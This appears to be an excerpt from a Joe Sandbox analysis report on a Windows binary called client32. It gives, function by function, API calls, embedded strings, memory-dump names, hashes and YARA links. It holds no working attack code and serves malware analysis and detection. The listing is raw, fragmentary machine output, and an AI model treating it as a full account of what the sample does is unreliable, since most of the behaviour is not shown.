Instruction ID: 2aa7a213fe02530d6649da53b875432d464f8bc862cdc2c3c02bddd3af265e2f
Opcode Fuzzy Hash: 4754ce91abff75684998c44684bd62a387d3770bcf39efdefb3a8636f8b0d38b
Instruction Fuzzy Hash: F4514CB5900706AFC700CF9AC980A9AFBF8FF08714F50852EE55AA7740E774A654CF91

Function 110930B0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 11092F20: std::_Xinvalid_argument.LIBCPMT ref: 11092F40
Part of subcall function 11092F20: _memmove.LIBCMT ref: 11092FC7
Part of subcall function 11092F20: _memmove.LIBCMT ref: 11092FEB

std::exception::exception.LIBCMT ref: 11093126

Part of subcall function 11150C1A: std::exception::_Copy_str.LIBCMT ref: 11150C35

__CxxThrowException@8.LIBCMT ref: 1109313B

Part of subcall function 11151071: RaiseException.KERNEL32(?,?,11103644,?,?,?,?,?,11103644,?,111B83A0), ref: 111510B3

Part of subcall function 11092F20: _memmove.LIBCMT ref: 11093025
Part of subcall function 11092F20: _memmove.LIBCMT ref: 11093041

std::exception::exception.LIBCMT ref: 110931C6
__CxxThrowException@8.LIBCMT ref: 110931DB

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception$Copy_strExceptionRaiseXinvalid_argumentstd::_std::exception::_
String ID:
API String ID: 3482316527-0
Opcode ID: 48381950686fee35f6dc86805a6ff2cf8b1dc353233030c430b72cf3119b753e
Instruction ID: 34a656192ea29ff877c28e50c2c63445a0478e0dc2d9df183b14054e6d04c7b1
Opcode Fuzzy Hash: 48381950686fee35f6dc86805a6ff2cf8b1dc353233030c430b72cf3119b753e
Instruction Fuzzy Hash: 89319279A0470AEFD320DF64D850AABB3F9FB44704F104969E96A97641D770F904CBA2

Function 110E1410 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 136COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000057,0261EF58,00000001,00000000,00000000,75A85440,?,00000000,1112A233), ref: 110E1564

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

NSSClientPlugin.cpp, xrefs: 110E148B
m_plugin_table[pluginid] == NULL, xrefs: 110E1490
InitPlugin(0x%08x, %d), xrefs: 110E1442

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$ExitMessageProcesswsprintf
String ID: InitPlugin(0x%08x, %d)$NSSClientPlugin.cpp$m_plugin_table[pluginid] == NULL
API String ID: 73808336-146751015
Opcode ID: fdae3d6caeb60e4e86b8a54e0c4a4c1f33da6f1cecb8f821e4c4b66ddad970f7
Instruction ID: ad6bb8f3b253fbe3b6a656bc4dae6ed0cb60087fd9fc08c2cee8f6ee06ca03d3
Opcode Fuzzy Hash: fdae3d6caeb60e4e86b8a54e0c4a4c1f33da6f1cecb8f821e4c4b66ddad970f7
Instruction Fuzzy Hash: 1A41A676E0625AAFDB11CB6A8C44BDEBBE4AF55754F044169EC0697380EA70DA0087E1

Function 11153123 Relevance: 6.1, APIs: 4, Instructions: 130COMMONLIBRARYCODE

Download Yara Rule

APIs

_memmove.LIBCMT ref: 111531BE
__flush.LIBCMT ref: 111531DC
__write.LIBCMT ref: 11153203
__flsbuf.LIBCMT ref: 1115322E

Part of subcall function 11157CCF: __getptd_noexit.LIBCMT ref: 11157CCF

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 534529e158e4db515927ccc196ef3b21eb4e7e2ebd5444ad79e5c81968efa83f
Instruction ID: 755ba38bf884ac0eeaaa92c0afe6aec453c5cd012c1134b2337e0c48102fae43
Opcode Fuzzy Hash: 534529e158e4db515927ccc196ef3b21eb4e7e2ebd5444ad79e5c81968efa83f
Instruction Fuzzy Hash: FD410631A18A05EBDBD58FB5C9C065EFBB6AF82364F25852CD47597280EB70EA41CB40

Function 6CC9BCF9 Relevance: 6.1, APIs: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6CC9BD2D
__isleadbyte_l.LIBCMT ref: 6CC9BD60
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?,?,?), ref: 6CC9BD91
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?,?,?), ref: 6CC9BDFF

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 62f3cf5d26c3e9aba067d9a66bbcc512f33da07773b46464373777bcaa17d252
Instruction ID: a53111a5788976e5c4a2abc46f7147e02309b98877631a0706922bf9186a50d1
Opcode Fuzzy Hash: 62f3cf5d26c3e9aba067d9a66bbcc512f33da07773b46464373777bcaa17d252
Instruction Fuzzy Hash: 1431A432A05289FFDB20CF64C8A4AAE7BB5FF01324B1485E9E4648B5A9F731D940CB50

Function 111670B8 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111670EC
__isleadbyte_l.LIBCMT ref: 1116711F
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,11167B23,00000109,00BFBBEF,00000003), ref: 11167150
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,11167B23,00000109,00BFBBEF,00000003), ref: 111671BE

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 70553f7c7fafef29c21006f25f5c2dae4ac7e8c976c213a9198f9563594dea5c
Instruction ID: a790c682b384103f3dc3b94a9d53280dae5bf4498d54a0adc54a3abaf1072143
Opcode Fuzzy Hash: 70553f7c7fafef29c21006f25f5c2dae4ac7e8c976c213a9198f9563594dea5c
Instruction Fuzzy Hash: 7931E531600656EFDB01DF64CD809ADBFBEBF02355F11896AE4608B191F7B2D960CB61

Function 6CC6BCE0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 6CC64400: EnterCriticalSection.KERNEL32(6CCA9898,00000000,?,?,?,?,?,6CC6BD15), ref: 6CC6441C
Part of subcall function 6CC64400: LeaveCriticalSection.KERNEL32(6CCA9898,?,?,?,?,?,6CC6BD15), ref: 6CC6442D

EnterCriticalSection.KERNEL32(6CCA9898), ref: 6CC6BD1D
LeaveCriticalSection.KERNEL32(6CCA9898), ref: 6CC6BD66

Strings

CMD=HANGUP, xrefs: 6CC6BDAB
CONNECTION_ID=%u, xrefs: 6CC6BDBA

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: CMD=HANGUP$CONNECTION_ID=%u
API String ID: 3168844106-3609349715
Opcode ID: 0520d276ba83711a87ee62665216655d4cf03423bbda11961ec17169ec87e6c6
Instruction ID: 0cfdbe61ba8e8302f6942a7306a8486c773d89a38be8c03c9aa27934870abeac
Opcode Fuzzy Hash: 0520d276ba83711a87ee62665216655d4cf03423bbda11961ec17169ec87e6c6
Instruction Fuzzy Hash: 9A31A8B1901205AFCB20CFBAD994AEF77F8EF45314F10896AE459D7A00F731A644CBA1

Function 1103B280 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 68sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4,00000000,?,00000000,-111D903C), ref: 1103B2B1

Strings

/weblock.htm, xrefs: 1103B31D
redirect:http://127.0.0.1, xrefs: 1103B2FD
:%u, xrefs: 1103B30F

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: /weblock.htm$:%u$redirect:http://127.0.0.1
API String ID: 3472027048-2181447511
Opcode ID: 6a60cb9f04780bf1a4e56164c16ea68f90256d0685b113d35d93a91b141b9392
Instruction ID: 163816d6f2ef246cfcbc0681839aaf7e4393b709d4332236b9ae6e4fd5f74bc1
Opcode Fuzzy Hash: 6a60cb9f04780bf1a4e56164c16ea68f90256d0685b113d35d93a91b141b9392
Instruction Fuzzy Hash: 4E110876E01116ABFB10DB64DC51FBEB7A99B5270CF0441E9EC0D97280DE607E048BE1

Function 6CC65C80 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 55COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CCA9898,?), ref: 6CC65CFE
LeaveCriticalSection.KERNEL32(6CCA9898), ref: 6CC65D13

Strings

RESULT, xrefs: 6CC65CA0
ERROR, xrefs: 6CC65CBD

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: ERROR$RESULT
API String ID: 3168844106-833402571
Opcode ID: cb9da5f68b50857df30650dbc3e39aa59f4a9cf66c62e49bf262630f8dc49c8c
Instruction ID: 0bceb37515a441d5408c3144c089248ae25cf4de64374e25ab73a2a297360570
Opcode Fuzzy Hash: cb9da5f68b50857df30650dbc3e39aa59f4a9cf66c62e49bf262630f8dc49c8c
Instruction Fuzzy Hash: E601F1B3D012453BEB204BB59C45ADB7A9CAB5429DF55043DF80A87F02F736D84987A2

Function 110ED0F0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 110ED100
GetSystemMetrics.USER32(0000004C), ref: 110ED123
GetSystemMetrics.USER32(0000004D), ref: 110ED12A
GetSystemMetrics.USER32(00000001), ref: 110ED131

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: e716a7c15c148c3bce95d1910b8bb650b858a5736b8f708ee99cec207b1cb7ae
Instruction ID: 83fd5bc5d8da2d79fb4b26aef42fb772e3a20f1d5eeb9d88145602deba3fecb7
Opcode Fuzzy Hash: e716a7c15c148c3bce95d1910b8bb650b858a5736b8f708ee99cec207b1cb7ae
Instruction Fuzzy Hash: 07018435701215AFF340DA6DCC91F6A77D9EF887A4F108166FA18CB281DAB1EC008BE0

Function 11131950 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

SetBkColor.GDI32(?,?), ref: 11131971
SetRect.USER32(?,?,?,?,?), ref: 11131989
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111319A0
SetBkColor.GDI32(?,00000000), ref: 111319A8

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Color$RectText
String ID:
API String ID: 4034337308-0
Opcode ID: 45324d8a3680e657acc28c071dd9c6bab6a1fc37b6920e72eb3f9391f2dcbffa
Instruction ID: 91959cfbb112a9f383ae0b8012336f58c44cd3dfd92b1e902552eecfac6a1df0
Opcode Fuzzy Hash: 45324d8a3680e657acc28c071dd9c6bab6a1fc37b6920e72eb3f9391f2dcbffa
Instruction Fuzzy Hash: D401EC76601218BFDB00DE98CC81FAFB3ADEF49714F508159FA15E7184DAB0AE118BA5

Function 110696B0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 354COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 110697A3
GetTickCount.KERNEL32 ref: 11069828

Strings

gfff, xrefs: 11069A81

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick
String ID: gfff
API String ID: 536389180-1553575800
Opcode ID: 3c44082f4a84c3b6d3aca5dcac9c6fc8a0c19091b8661a0142e56481f553a411
Instruction ID: 7a15541ad9cc86498fe25248fb5b00ff822371ef0dbd8c0732db3f12087e27af
Opcode Fuzzy Hash: 3c44082f4a84c3b6d3aca5dcac9c6fc8a0c19091b8661a0142e56481f553a411
Instruction Fuzzy Hash: 04C1E675E003059FDB10CBA4DC81BDFB7F9EB44718F044529E51AA72C1EBB6AA40C791

Function 110071D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7

CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 11007327
SetFocus.USER32(?), ref: 11007383

Strings

edit, xrefs: 11007321

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFocusWindow_malloc_memsetwsprintf
String ID: edit
API String ID: 1305092643-2167791130
Opcode ID: 27315c5d1f7352d15abcfce75e4c126172236694e22f52a29f659be4a097c581
Instruction ID: de039c6dd70e6cc582895792d79c964172256b88ad53612648e90ac57d52fd2d
Opcode Fuzzy Hash: 27315c5d1f7352d15abcfce75e4c126172236694e22f52a29f659be4a097c581
Instruction Fuzzy Hash: F4518FB6A00606AFE741CF68DC80BABB7E5FB89354F11856DF955C7340EA34E942CB60

Function 11037320 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 1103734C

Part of subcall function 11151A96: __getptd.LIBCMT ref: 11151AB4

_strtok.LIBCMT ref: 1103741C

Strings

; >, xrefs: 11037343, 11037415

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok$__getptd
String ID: ; >
API String ID: 715173073-2207967850
Opcode ID: 83b7e2a6cbd220261976a2cc7d86380cb3eec4cdc2f60ae252d597ced3692ed7
Instruction ID: f7621361e6c596b186c407d080d6d1f1d77a3e25de21221ea8e27b6559dd514c
Opcode Fuzzy Hash: 83b7e2a6cbd220261976a2cc7d86380cb3eec4cdc2f60ae252d597ced3692ed7
Instruction Fuzzy Hash: 50316D36D10A6A6FDB12CAA48C41BDEFBE4DF8035AF158494DC94AB340E730BD4587E1

Function 6CC75CB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6CC75CD0

Strings

buf, xrefs: 6CC75CE8
